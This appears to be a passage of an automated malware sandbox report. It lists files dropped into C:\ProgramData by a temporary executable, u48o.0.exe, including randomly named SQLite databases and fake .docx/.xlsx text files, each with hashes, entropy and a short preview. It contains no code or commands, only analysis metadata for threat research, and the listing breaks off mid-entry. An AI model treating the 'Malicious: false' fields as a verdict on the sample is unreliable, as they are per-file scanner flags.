Encrypted:	false
SSDEEP:	24:hvsWN1mO5uGrz/I7zHH1p0zqzlGo9+kLDw5vXGTxrVYDH+:h3N8O5Rrz/Ww4lGoPLdVg+
MD5:	B8F3A1455E95B1CF3432BF983042773B
SHA1:	F205A118C84B93F8D41F9F3A0C3F5739B308A3BD
SHA-256:	F28BAE1CF8CA75EF22D6F1B09E711B7CE094E88420F0085CD54522F42E2F01CC
SHA-512:	8E565B641B5FD2E12605880EDE93270A75B170462139E0A604E9392EAE17E9ED898657AC5CF3940D6642FA1C30932B5457C5ED3F48945406D8D52FFDAE4C75EC
Malicious:	false
Reputation:	unknown
Preview:	DWTHNHNNJBNUOLHJSZISMDGJOYXTZZHUGXLVDUQRAEGRPGUJZOCKQITJDWWXLEKCBGNUXRHFKQNVYEOUAPWVUNRKEGOVRSMLUWJEDVYMGZNTPHFYBRBQKTDCSSUSYEFMSBVJIUZXBZTSOHJUGSMYXMCHCXFJRJWCIMIIBLQTYLCFAYBJJDFARAIASDNTGSCWOVPZQVOLZSDXHBWJKTFKDASDWBZAKTZORAZAYMGQAWYBXYSFHGIFDLGGWKOZHAKPMQDVATIAOQBMHQSPKRBCMODLQIXQPGYLUPHCCYRGFMMUNVADRWLBPHJTZMIBWBBNTGIKVBMISXLSCBVIJKSLAYUGSXYTWZXZEUNPSJHQDCYEUFAEFXVKTZLRWTCCBJEUMWRIOJQZDSKPYAXWZFFGELTRSKYQLZIJELZOOYTMOTXAVQFHZOTOYJRTETJWEYJSIKLGRPKHTDUAISIYRKTOTNIFBGJZDDLKNVDBWZPCZRBGCQVYWVVYPGSOJLVEEYAEGKNLGKHGWDNSTUBBACNMNKWHSEVSQQBPUBUQDPMAYUMOEKRDDULTRBJHROGAKDVOBRFGLXLEPPGPAOSMYHGQPLZVPJQPHVJECMGUAKGHDTRXXACRQCFVKNWHWLHHCPJPVQQVIJGFKFVKEZUOFIJPAGHPJNNXVXIPDRSYFAAUMDAXMMQYHYXSQCVGYKVCLTYUTCPZJEMADJIUEQIXZWEBGFSJRPNCJBGIRLATPCTHDDTOZYQETROWIDHELZOIYGROYRHTLACZEAAOGNJQWDLKLGFABXVJYRCNUWGFVDZUUJMAZAOCPBSGXKYOBTOFSVELAWARUWBQDAJUSVWCITXEQOPHLMEQQFXPPYDIRXJXPELMDYSPWTSNOQKFKNHOSIBCKLQWNBVVZSZKFPEPAAYEMUOZCVBZFPQTOSLEUQFOMZPXBRUFRPVLLIMOKJVZSYBIUFACEGBCKQVRWLXWDOKKECLVGPWOMOUDVXKXHIQF

C:\ProgramData\DWTHNHNNJB.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u48o.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.706547634051575
Encrypted:	false
SSDEEP:	24:hvsWN1mO5uGrz/I7zHH1p0zqzlGo9+kLDw5vXGTxrVYDH+:h3N8O5Rrz/Ww4lGoPLdVg+
MD5:	B8F3A1455E95B1CF3432BF983042773B
SHA1:	F205A118C84B93F8D41F9F3A0C3F5739B308A3BD
SHA-256:	F28BAE1CF8CA75EF22D6F1B09E711B7CE094E88420F0085CD54522F42E2F01CC
SHA-512:	8E565B641B5FD2E12605880EDE93270A75B170462139E0A604E9392EAE17E9ED898657AC5CF3940D6642FA1C30932B5457C5ED3F48945406D8D52FFDAE4C75EC
Malicious:	false
Reputation:	unknown
Preview:	DWTHNHNNJBNUOLHJSZISMDGJOYXTZZHUGXLVDUQRAEGRPGUJZOCKQITJDWWXLEKCBGNUXRHFKQNVYEOUAPWVUNRKEGOVRSMLUWJEDVYMGZNTPHFYBRBQKTDCSSUSYEFMSBVJIUZXBZTSOHJUGSMYXMCHCXFJRJWCIMIIBLQTYLCFAYBJJDFARAIASDNTGSCWOVPZQVOLZSDXHBWJKTFKDASDWBZAKTZORAZAYMGQAWYBXYSFHGIFDLGGWKOZHAKPMQDVATIAOQBMHQSPKRBCMODLQIXQPGYLUPHCCYRGFMMUNVADRWLBPHJTZMIBWBBNTGIKVBMISXLSCBVIJKSLAYUGSXYTWZXZEUNPSJHQDCYEUFAEFXVKTZLRWTCCBJEUMWRIOJQZDSKPYAXWZFFGELTRSKYQLZIJELZOOYTMOTXAVQFHZOTOYJRTETJWEYJSIKLGRPKHTDUAISIYRKTOTNIFBGJZDDLKNVDBWZPCZRBGCQVYWVVYPGSOJLVEEYAEGKNLGKHGWDNSTUBBACNMNKWHSEVSQQBPUBUQDPMAYUMOEKRDDULTRBJHROGAKDVOBRFGLXLEPPGPAOSMYHGQPLZVPJQPHVJECMGUAKGHDTRXXACRQCFVKNWHWLHHCPJPVQQVIJGFKFVKEZUOFIJPAGHPJNNXVXIPDRSYFAAUMDAXMMQYHYXSQCVGYKVCLTYUTCPZJEMADJIUEQIXZWEBGFSJRPNCJBGIRLATPCTHDDTOZYQETROWIDHELZOIYGROYRHTLACZEAAOGNJQWDLKLGFABXVJYRCNUWGFVDZUUJMAZAOCPBSGXKYOBTOFSVELAWARUWBQDAJUSVWCITXEQOPHLMEQQFXPPYDIRXJXPELMDYSPWTSNOQKFKNHOSIBCKLQWNBVVZSZKFPEPAAYEMUOZCVBZFPQTOSLEUQFOMZPXBRUFRPVLLIMOKJVZSYBIUFACEGBCKQVRWLXWDOKKECLVGPWOMOUDVXKXHIQF

C:\ProgramData\FIIIIDGHJEBFBGDHDGIIIIJDHJ

Download File

Process:	C:\Users\user\AppData\Local\Temp\u48o.0.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GLTYDMDUST.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u48o.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69569301223482
Encrypted:	false
SSDEEP:	24:P1aJ3UFXnPRRqJn5Ao7J4kXjiut748cX3Gg6hQk:P1aWFX5RQnAuh48cHGg6hQk
MD5:	CA404BEA65D84F58838AF73B2DC67E02
SHA1:	56EDE3A3BF70705B1D42A2AE13F6605057C1E5F6
SHA-256:	4A28C898DF5967827C26FD633CD56275159EF4C4C0193E484E8E8F3E9ECC66B9
SHA-512:	10C144317CDB5A368733346EB8440A986A377916F98BE0E8232E668A8C5E107E06829ADF575751B94D0B0AA37F4CAC48DBD7BC64FFE8DCB140FB033C00CEC721
Malicious:	false
Reputation:	unknown
Preview:	GLTYDMDUSTFARDVTDTOSUXWTZPBTWYSDUWRWNQMOYZIOPMOCUVTIJOHJYLHKBCEDWQBIYLQPLFXNZVXOZBIBDNIIHCNZHRIZBCANIAZPBFFJNXGCWLILIHHCYJHZSFIZUUDHFLQEWBBOMWJOZCKSAOAVKAWDPLPLVPHHMTSMKFCHYLMZJYKTJZUGPCSSVJJOKBWSTSLHJSIZZNIHOVEXPMQSKABHGSGHFUWVNTWTGYCLXOQEPAIEYRMLWJNNZHEPKXAHFKJUQHDHBHMPKXFCHXQYMICUKIVHNMPIJURPFBDBUQWHFTUVKPWMJHVOENGHYYNPMJPLPTQKABBVHNTLFXAJUISPUCEXPQFWXNQKGLSPRPJEAIJQZNYNOWAKNLRQHQRIOFXWLXEJZPOKNRPRZQJIGYXOWWZDFNURUOTFOOSKCNYLZXJZIWHYYUTOQRDTTRMPEMHZSRVZISBDQKRQYXAZOKOCTHUJKZWNHJSEMHTCSKCARZUYORNVIXVWTGAWUONMQVDITNHLNLJNREIEBPKELOMXBMEUBFTSVSGBVXSXHICRIGHIFVXWPXMIKKKCBOFCJGKJYZJDAWFCHWCNIMOPOPYUXDESMSSFNZBKRVTKTFPFGCIMVLKPBRKBRZJRHIYUQFAFEODGJZAXKRAFGTBXKKKTOXYTJBCHZWBDPBSBRTICVTUOWNEXJIZFESQAIMINDZJFLHIQSMVIICPGSEVSLVSVPMBXUGAPVVXVNJEBHRRBRPIHKGVJJDRANYKMMFJJBFPKFDJAROFBZANTWLCLSELNCCDRQUPZIMXLCVFZOFWKZYXCLQVRUFHUTIFPNWERRWWXHSVZHEYMHULWKGIIWKBRWODYKIGEPXGOEZXMJVKVNTEOQXZBOZBXYKMUGZUYMELGGHJJVDPONTLTQGITEMXYMMOGRWMQDUHIGHPJWPGIEZDZPFZHQMQKLTBUGJXLBLEGTFQZOXBPYRZFHNMZGVZGRAKFYTWDWWKV

C:\ProgramData\GNLQNHOLWB.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u48o.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698695541849584
Encrypted:	false
SSDEEP:	24:ZE+7+1bm31iNKty4eaTDMDURN6ZqyioAe1L:ZE+61bm0Qty41T5N6ZNLAeZ
MD5:	64E7020B0B401F75D3061A1917D99E04
SHA1:	785E09A2F76464E26CE282F41DE07D1B27FFB855
SHA-256:	9E5D6C897851C4A24A0D3BC4F9291A971550B9F1B9F9CFB86D7A2D5F12CD63B0
SHA-512:	14D18C0739A9B9097C2135DF001E31BA17772A9ED1DFC62318AD092C133F8C054E5C335354C57929137344E11AC6F0EBC5032211136D1F1B3F6DF8F1434D90E3
Malicious:	false
Reputation:	unknown
Preview:	GNLQNHOLWBOQVJIFTLNFGJNNXMGUZOMCUNVQXIPWIQSXJKHHVRYLBVHOHRRAZCZOOSABVUNECAWUZDTCLDYZAFJGGGUXKDFDPLZWHOYARDSHMWUJKNJPXNWQKOEVEVLWQLXKJLHTDQZQULYODUZGGIUHFXGBKGLAQBERUUCASFPJWCVSHYWEKXXBEZZVPBKVPPRGJJFXTGVBUVLUVQNAPBMPJOZNNFCDPEHNHWSMZSBAYITASRGZTGXSYUNNLKZKAVLGDGRIUVYOWINQLHMWTCZYYSGNSZQWZQNLKENKZJSDTJDSZVFQGHKVENDXCIHQVPCJNVXYVCJTKGGQJHTLGYJROSCXNGTCNNLCBSAOHAXWLQLCXTRIYCZVDEDWKBEHBEBKKXYVNQHTFFQFVFLHQRXMYLCHQAJKIRETOPSMFDVMJOROHVBDNWQMACXDCGCPKSQUIXWYXSYDPSBSUJMXEBPBCWJDOKOSFYRZQSCWEIHCQFTRYQVAUUYDVCYUHDRUKCTOGNWSTPHONXNHSHICTVCMWIDPOKQMNGFKZOADDJPTUVPEWWFNEKDLAVDZNBHHFIRSPGSQGUQUGGIRSVJTEIAUJEHUVHRJPWEMACBNRIWVFWWRDNGHYAESSKWHOCXLPYRMKQYTXSSYLKESQEPWVDSSTKTYQDQTTAUVWPQFTTJMGMEGRECDIFCMPKXTYYNGENSBDKEVPPDNRRDLULORZGHRQIQWLMHMKLKDLNSNWXWGTMDLMPWAGGPUJXOOYWOGWZTDKIVNNXMKJEFALSJECCOVZVTAPKGAXWCUMHLAHYBPLBTDXBKKPKPJFJOKZKMPEWOOMMMCZHSENRPGKEJJHHOVFETVBBFBTDTSNLGGPVPAFDOXRJUKYZTGOFQUAVOGUZJARUUCKMRYUSWZIRYUATBQRRVCNMFMMBTGSFQCAOTPTSBPCICPBMURXQOIITZCLXKSJVDGFLGHUIHTALRYCNLFILDCLQXDOGMOKPXT

C:\ProgramData\HCGCAAKJDHJJJJJKKKFBKFBAEB

Download File

Process:	C:\Users\user\AppData\Local\Temp\u48o.0.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03786218306281921
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWB2IGKhNbxrO3Dpvu2HI:58r54w0VW3xWB2ohFQ3Y2
MD5:	4BB4A37B8E93E9B0F5D3DF275799D45E
SHA1:	E27DF7CC49B0D145140C119A99C1BBAA9ECCE8F7
SHA-256:	89BC0F21671C244C40A9EA42893B508858AD6E1E26AC16F2BD507C3E8CBB3CF7
SHA-512:	F2FC9067EF11DC3B719507B97C76A19B9E976D143A2FD11474B8D2A2848A706AFCA316A95FEEBA644099497A95E1C426CDAB923D5A70619018E1543FEF3182DB
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HIIIEGDBKJKEBGCBAFCF

Download File

Process:	C:\Users\user\AppData\Local\Temp\u48o.0.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HMPPSXQPQV.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u48o.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698711683401115
Encrypted:	false
SSDEEP:	24:qKHpKPokvebe5xXL3g76mBU/gS2JBbl20IS7pnXk:Rpcjnxbw7TYgS2nbzIS7pnXk
MD5:	47643CE7571E0C995094D7CE5F2005D7
SHA1:	40D42828B2F68C625EBD884FB8AF5B20F5A1DF9C
SHA-256:	1D642D4EC7BC821B0FFA28C3F2702C875C922139D8001EADD664EBCCF8D321B3
SHA-512:	3AAD0470C01D2609662C0B8D146BA79132B404C669C22032D085233E2D30725797AC2E15A11F54DFE00E4B6CA6E914E3439D4775B3AF6D782334FE9424F485A5
Malicious:	false
Reputation:	unknown
Preview:	HMPPSXQPQVZTKYGXRLZXZQHGCZSWFSMKAZTFZQVPBWYDEIQOYRZBKZROCVLLNDGOXMZATHCHJWBWCKMDMUVOMUCFYNBSIKMCOOAGLUHDSCAREEEQGTRYCAFLTFVCHREFHJJALACUPWFTGZJJVRRQBVOZGXIEUBTJBNHNAXRWAWTUYQZIZWPARDBZBFGZUBQQPINOCLFOLDPTMWQVUUBDSNGDFVMEOTHPNKBOMDPGLFXUXBXHUOTYRPUQTUJPKLUSNTISPNFAHVFBBWEWJQFBJFCDDWUUKCQJNEKMUTJEZKKMXXOCBOVMCGGYTPDYBYYFVGHQJJBCDHYWPXJUJWPNURQCUHPTATLFRAOGUCJWWSBAITHVPDRYRFCTPIWHJVKSAXOIPKHISTBCDZISGIVPPYDJLJWFRNVNCWIOINKYQLAFVLCPSGCZABGNTUVGEDQZGQNDECUBPLLOYUYTHXDNNCAXKLHFZXBBAWBICFREGZBLZZMPWRLUSXUNEXAKLSJETGNCJTTGSNPPSHZUKZDHHYHBBWKJUSIBAKGKHQJINZHCWLBCIIUGTVVLNEZXUBIPUVRAILLENTRJYFNIBHNOUNYAIFQBNUMFUSXNGITFIFZKTSFAQXDYVBIUCIUYJIGJTIJHWTPPRJQVSBHHUXLZRPPJOWJAPSVQQVKLFHKXZRPEJBFXNKVNBCPMLRQGCJINKLLBJVROFAFCDRFCDAMIDEYSZDWNLUMJZXGWKOIKNAYVXPYRZWMBNAAFKFOPCVNGUECOARMDWJVYVUQQAFEGKCYXVVGXPHPEVOMRADTQDTJSHAKHPNNOGUDWBRXDJFEMSJTJUJKHZONBLGDCDDUDTRQKPOFACELSKHFSBPKXKDGWOKSDBAMWLKXEAOOHWVOAQZGZCNSDWOXSHPTFMVMYQXTRNMUPZSFQXOQLPUFJWHWTXXIRMQXDPVAJKHMSCGTFVJKECYILRMHGFBWQKUNTRVZTBJQJAKTSJUIDOLPL

C:\ProgramData\HMPPSXQPQV.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u48o.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698711683401115
Encrypted:	false
SSDEEP:	24:qKHpKPokvebe5xXL3g76mBU/gS2JBbl20IS7pnXk:Rpcjnxbw7TYgS2nbzIS7pnXk
MD5:	47643CE7571E0C995094D7CE5F2005D7
SHA1:	40D42828B2F68C625EBD884FB8AF5B20F5A1DF9C
SHA-256:	1D642D4EC7BC821B0FFA28C3F2702C875C922139D8001EADD664EBCCF8D321B3
SHA-512:	3AAD0470C01D2609662C0B8D146BA79132B404C669C22032D085233E2D30725797AC2E15A11F54DFE00E4B6CA6E914E3439D4775B3AF6D782334FE9424F485A5
Malicious:	false
Reputation:	unknown
Preview:	HMPPSXQPQVZTKYGXRLZXZQHGCZSWFSMKAZTFZQVPBWYDEIQOYRZBKZROCVLLNDGOXMZATHCHJWBWCKMDMUVOMUCFYNBSIKMCOOAGLUHDSCAREEEQGTRYCAFLTFVCHREFHJJALACUPWFTGZJJVRRQBVOZGXIEUBTJBNHNAXRWAWTUYQZIZWPARDBZBFGZUBQQPINOCLFOLDPTMWQVUUBDSNGDFVMEOTHPNKBOMDPGLFXUXBXHUOTYRPUQTUJPKLUSNTISPNFAHVFBBWEWJQFBJFCDDWUUKCQJNEKMUTJEZKKMXXOCBOVMCGGYTPDYBYYFVGHQJJBCDHYWPXJUJWPNURQCUHPTATLFRAOGUCJWWSBAITHVPDRYRFCTPIWHJVKSAXOIPKHISTBCDZISGIVPPYDJLJWFRNVNCWIOINKYQLAFVLCPSGCZABGNTUVGEDQZGQNDECUBPLLOYUYTHXDNNCAXKLHFZXBBAWBICFREGZBLZZMPWRLUSXUNEXAKLSJETGNCJTTGSNPPSHZUKZDHHYHBBWKJUSIBAKGKHQJINZHCWLBCIIUGTVVLNEZXUBIPUVRAILLENTRJYFNIBHNOUNYAIFQBNUMFUSXNGITFIFZKTSFAQXDYVBIUCIUYJIGJTIJHWTPPRJQVSBHHUXLZRPPJOWJAPSVQQVKLFHKXZRPEJBFXNKVNBCPMLRQGCJINKLLBJVROFAFCDRFCDAMIDEYSZDWNLUMJZXGWKOIKNAYVXPYRZWMBNAAFKFOPCVNGUECOARMDWJVYVUQQAFEGKCYXVVGXPHPEVOMRADTQDTJSHAKHPNNOGUDWBRXDJFEMSJTJUJKHZONBLGDCDDUDTRQKPOFACELSKHFSBPKXKDGWOKSDBAMWLKXEAOOHWVOAQZGZCNSDWOXSHPTFMVMYQXTRNMUPZSFQXOQLPUFJWHWTXXIRMQXDPVAJKHMSCGTFVJKECYILRMHGFBWQKUNTRVZTBJQJAKTSJUIDOLPL

C:\ProgramData\IYEPUIQXSK.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u48o.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.697753460288242
Encrypted:	false
SSDEEP:	24:HsRCds67IJTDT5xb12CyWTLAaR3BNw/tZn5D4O:HMCilxb12nzaBnwhf
MD5:	94DAFC1D85CD870A4F587F29D12C5756
SHA1:	D155E950DB7096969FA07355D359500B54E90DC8
SHA-256:	C6E8FE24E3E17241CF911B00E8A961F4CA84B1CAEDA78AFB9C11E3F40197F894
SHA-512:	70904F5C8153EDF02FFEF0571F8DE4A647C9DB215F1A7C65291B4C5910DE18E5E19838C4F94281555AC7CB33AC5D1F8A6E903225E0BD6827B033C042BC71AF0A
Malicious:	false
Reputation:	unknown
Preview:	IYEPUIQXSKCYAPPMDBBJFUFSVGKYORVMQYYHGYEZITIALMPHTPGBBGYJESZAUBKJMZYBPZMDMMAMHVSIOUYVASETHUAYUPPEQRULMXZBPMMNCBNBMDCFYRPNCXJRSPRYDRUCVCAUHINJWDCWAAHBDHSSRPZAWWETCFUJOTGDONNZWLLNGCDPIMOBBGUYLZZUZEHARHWZDUMCWRPKNYJTKZCGWKDMMERSKEFDQGVKWSAHDESUFIXARXNMNKGAEFLKZAHPLWNICTUFUGNCNTAZSWMYRXWUHOVNAJRNZNDFEODXAMPUOTLEIETHLRCJTDQRVOFYFWMULABJHVLIUYAPOYWYSEVCKUDZOXKRJAIVAQGAYSNIXBOAMMCTECZJNWDNFBTGDKMCHRZKROZZUGUPIWLRVPSHOETKQKHETUDGEEOVAHUDSPMZZKNOAZSFEXBGHWWEZDVJKUXCUJCJXUOBOHAFXWGIZNWNCRYNBBMPMDEEBVCUFSPNZNIUMYREXCTRWSXIYOTYKDSFRMVYHGABUSGSNQRAUQKHLDURPUDSNTOCLZDXLLHOBCHCJINUWKWHMBCPQIBNWPXZKXEDNYXPRXVUWBPJXVVTZNJWRCZZFIOYYUCFWDWAIPPXZQHMMWWEJGYNKLVTKFYZICCXWXHWQNOXGGLZIDJDRKTTKQJPTTPJYSIEDVJZIPLCKCPAXCZFBIHJYRJGBSQIFQLEOFAZBLNBCIPEJKVLFSIUYTRQYFCZDMKTYWSQXFHWQQFGOJFSTMKDJQSPQEYQBXSQHSHLEOPFFQXRINWZFRNWMRRMHAAFPLEQACJSACWYIZKPPJDMCHQNDFLZMESZOTIYKRJXKJBDFRDSUYFIFJFEMXQIEIXXGQITQPCQJXYVUBMITMTTTFTHMYAMEAEDVVLHNIIZSFRPHKQXGRHPPCPFQKILHFYGUPTPJWWLAJXDDTKYGMMUMLUQLMXEAWVWQMZREMNSLADFMMFSFYCOQTLARJET

C:\ProgramData\IZMFBFKMEB.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u48o.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695566741548326
Encrypted:	false
SSDEEP:	24:61iSJC9lUfmxZoTgwj7WkGrivJpQ4t468phJvvHIm:6M/lU+x27HleIQ4t4bHIm
MD5:	CA699715DA51DFD5AB81CDA02AFD2CD7
SHA1:	72D44C17A04FAB316BEA20F61A80D7AC787879D4
SHA-256:	BA61F500E1845F2FC03C990DA95B7DD92ED8B7583744C941D37BDD90DA666D21
SHA-512:	497F9D6B6EE52454F4B740A6B765F46EBC10575E9A20B62D76594E1CC4E37868182D18315E05E62A78D5131A5569C95C8989F248E3A8C72BD95A99883DF196D2
Malicious:	false
Reputation:	unknown
Preview:	IZMFBFKMEBTITTFFYOGRJOKLUYKYEMJURKRTIEUFEDJKBQPELZNUOXWVNDZJRAOONFPZIJHBCSQXWTLQPDNPIJFFQZDETQFKNDQYRTMSHJIWQXJBNOXAVBJCARKFOKHIBUFVCEOHZTISPCFZSEFFASUHHMDHUBAMSDTGESWVKGUMZNYRLTUEBNLLDQOMZLGIFYUADUMCNGQHUWJKQAWHNDDSWUDEYOPPNFAUERMDDQUABWZCHPIWYDNDHUXDNYSLQSQXHUJRCQMGRZMRHEOVRBHVMIEIIBHEADKNABKWVMULXGOWXFOLUTZDUOKAMBBJKEPASVGVTDOUQMBCJGMPZZSAVFTSOBTVJPGYYQSJQWHRBFXNUHYKYXWZSTJELLKRMBHUVLFEPITLTURHTDAKMVDVNYWADPMNSQACTPRPTZDAYSYQHCRSDUXMKTYASRROVGGBBIXHTORYFNKLOIBCKWHWPTJGKEQOSVXTUUTFZVORIRTKYSUWDEDDGTJHWLZYRYCPYUENHHDNRWCVEAZUDOXSWLHJDIGSALQSCJKGZEXAIJUDAQHXCOAVPDFCQIEHQEFVSBLKSKPDHYCYSPHGVTEDVHAWYWOOWFAJSTOXLDYSHUWZIJQGRICKYUZPXLOZURIDFCEWXUMATNYLUVJTEOTDEYCCRPCVBPHMOLWESOWCICFDWLNMYIPCOLYFBDDSRCSOZZCSIWGDPTAXMSUSNBSGLDTYGEEBZGXKIVMAHAMBSJEUPRTVXERTMYQWIYUTCCWNXDLXQQSMSGHDXMIYKWUXJBHOCOBAEVHTWJOZVUWZIGVYBPSQGRQDABKLPWJJRURTHDJAMMOZSJFGCHHDVYXDYYIUIOZDZJWQLIKTEKOTISNTJFMZOMVLIYUHJEAMEKRMBWXHAYWZVDUJKHILQWXCRKUPFLJKIKWARBWYUOFDHFXEHJWSBCSSQMNJANADKJFCPMBCMQGQXNUCZETZWJFUFSMVAZQXHOGKPFDO

C:\ProgramData\JDAFBKECAKFCAAAKJDAKJEGDAF

Download File

Process:	C:\Users\user\AppData\Local\Temp\u48o.0.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JDHJKKFBAEGDGDGCBKECBGCGCF

Download File

Process:	C:\Users\user\AppData\Local\Temp\u48o.0.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.848598812124929
Encrypted:	false
SSDEEP:	24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBODYfOg1ZAJFF0DiUhQ5de5SjhXE1:ThFawNLopFgU10XJBODqzqFF0DYde5P
MD5:	9664DAA86F8917816B588C715D97BE07
SHA1:	FAD9771763CD861ED8F3A57004C4B371422B7761
SHA-256:	8FED359D88F0588829BA60D236269B2528742F7F66DF3ACF22B32B8F883FE785
SHA-512:	E551D5CC3D5709EE00F85BB92A25DDC96112A4357DFEA3D859559D47DB30FEBD2FD36BDFA2BEC6DCA63D3E233996E9FCD2237F92CEE5B32BA8D7F2E1913B2DA9
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JEHIIDGC

Download File

Process:	C:\Users\user\AppData\Local\Temp\u48o.0.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1215420383712111
Encrypted:	false
SSDEEP:	384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
MD5:	9A809AD8B1FDDA60760BB6253358A1DB
SHA1:	D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
SHA-256:	95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
SHA-512:	2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KECGHIJDGCBKECAAKKEC

Download File

Process:	C:\Users\user\AppData\Local\Temp\u48o.0.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
